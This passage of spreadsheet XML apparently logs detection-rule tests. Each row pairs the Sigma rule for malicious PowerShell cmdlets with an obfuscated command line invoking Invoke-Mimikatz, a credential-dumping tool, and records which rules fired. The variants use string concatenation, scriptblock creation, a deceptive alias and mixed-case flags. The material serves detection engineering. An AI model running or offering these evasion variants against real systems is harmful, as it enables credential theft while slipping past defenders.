      <c r="E2674" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F2674" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2674" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2674" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2674" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2674" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2674" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2675" ht="15.75" customHeight="1" s="42">
      <c r="A2675" s="44" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B2675" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2675" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2675" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2675" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -commaND "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F2675" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2675" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2675" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2675" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2675" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2675" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2676" ht="15.75" customHeight="1" s="42">
      <c r="A2676" s="44" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B2676" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2676" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2676" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2676" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmMAND "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F2676" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2676" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2676" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2676" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2676" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2676" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2677" ht="15.75" customHeight="1" s="42">
      <c r="A2677" s="44" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B2677" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2677" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2677" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2677" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmand "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F2677" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2677" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2677" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2677" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2677" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2677" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2678" ht="15.75" customHeight="1" s="42">
      <c r="A2678" s="44" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B2678" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2678" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2678" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2678" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -comMAnd "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F2678" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2678" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2678" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2678" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2678" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2678" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2679" ht="15.75" customHeight="1" s="42">
      <c r="A2679" s="44" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B2679" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2679" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2679" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2679" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMaND "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F2679" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2679" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2679" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2679" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2679" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2679" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2680" ht="15.75" customHeight="1" s="42">
      <c r="A2680" s="44" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B2680" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2680" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2680" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2680" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F2680" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2680" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2680" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2680" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2680" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2680" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2681" ht="15.75" customHeight="1" s="42">
      <c r="A2681" s="44" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B2681" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2681" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2681" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2681" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmAnd "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F2681" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2681" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2681" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2681" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2681" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2681" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2682" ht="15.75" customHeight="1" s="42">
      <c r="A2682" s="44" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B2682" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2682" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2682" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2682" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F2682" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2682" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2682" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2682" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2682" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2682" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2683" ht="15.75" customHeight="1" s="42">
      <c r="A2683" s="44" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B2683" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2683" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2683" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2683" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMMand "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F2683" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2683" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2683" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2683" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2683" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2683" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2684" ht="15.75" customHeight="1" s="42">
      <c r="A2684" s="44" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B2684" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2684" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2684" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2684" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ComMAND "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F2684" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2684" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2684" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2684" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2684" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2684" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2685" ht="15.75" customHeight="1" s="42">
      <c r="A2685" s="44" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B2685" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2685" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2685" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2685" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F2685" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2685" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2685" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I268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85" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2685" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2686" ht="15.75" customHeight="1" s="42">
      <c r="A2686" s="44" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B2686" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2686" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2686" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2686" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F2686" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2686" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2686" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I268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86" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2686" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2687" ht="15.75" customHeight="1" s="42">
      <c r="A2687" s="44" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B2687" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2687" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2687" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2687" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmanD "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F2687" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2687" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2687" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I268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87" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2687" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2688" ht="15.75" customHeight="1" s="42">
      <c r="A2688" s="44" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B2688" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2688" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2688" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2688" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmManD "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F2688" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2688" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2688" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I268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88" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2688" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2689" ht="15.75" customHeight="1" s="42">
      <c r="A2689" s="44" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B2689" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2689" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2689" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2689" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F2689" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2689" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2689" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2689" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2689" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2689" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2690" ht="15.75" customHeight="1" s="42">
      <c r="A2690" s="44" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B2690" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2690" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2690" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2690" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F2690" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2690" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2690" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2690" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2690" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2690" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2691" ht="15.75" customHeight="1" s="42">
      <c r="A2691" s="43" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B2691" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2691" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2691" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2691" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmMand "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F2691" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2691" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2691" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2691" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2691" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2691" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2692" ht="15.75" customHeight="1" s="42">
      <c r="A2692" s="43" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B2692" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2692" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2692" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2692" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMmaNd "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F2692" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2692" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2692" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2692" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2692" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2692" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2693" ht="15.75" customHeight="1" s="42">
      <c r="A2693" s="43" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B2693" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2693" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2693" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2693" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ComManD "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F2693" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2693" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2693" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2693" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2693" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2693" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2694" ht="15.75" customHeight="1" s="42">
      <c r="A2694" s="43" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B2694" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2694" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2694" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2694" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2694" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2694" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2694" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I269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4" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2694" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2695" ht="15.75" customHeight="1" s="42">
      <c r="A2695" s="43" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B2695" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2695" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2695" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2695" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmAnd "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2695" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2695" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2695" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I269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5" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2695" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2696" ht="15.75" customHeight="1" s="42">
      <c r="A2696" s="43" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B2696" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2696" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2696" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2696" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2696" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2696" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2696" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I269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6" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2696" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2697" ht="15.75" customHeight="1" s="42">
      <c r="A2697" s="43" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B2697" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2697" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2697" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2697" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -comMAND "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2697" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2697" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2697" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I269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7" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2697" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2698" ht="15.75" customHeight="1" s="42">
      <c r="A2698" s="43" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B2698" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2698" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2698" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2698" s="44" t="inlineStr">
        <is>
